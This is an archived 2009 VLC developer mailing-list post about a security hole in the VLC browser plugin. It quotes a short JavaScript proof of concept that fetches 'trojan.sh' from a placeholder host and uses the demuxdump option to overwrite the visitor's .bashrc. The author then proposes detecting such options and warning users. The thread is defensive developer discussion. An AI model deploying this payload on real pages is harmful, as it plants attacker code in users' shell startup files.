[vlc-devel] Regarding the seemingly still "obscure" security problem
Jean-Baptiste Kempf
jb at videolan.org
Sat Jan 17 16:34:04 CET 2009
On Sat, Jan 17, 2009 at 03:26:25PM +0200, Rémi Denis-Courmont wrote :
> <script type="text/javascript"><!--
> var vlc = document.getElementById("vlc");
> var src = "http/dump://www.example.com/trojan.sh";
> var dst = ".bashrc";
> vlc.playlist.add (src, "File", ":demuxdump-file=" + dst);
> vlc.playlist.play ();
> //!--></script>
> </body>
> </html>
I think this was brought to attention during the summit.
One question is: could we, in the plugin call add( ),
detect demuxdump, sout and file-logging options and in that case,
warn the user that some file will be overwritten?
Best Regards,
--
Jean-Baptiste Kempf
http://www.jbkempf.com/
More information about the vlc-devel
mailing list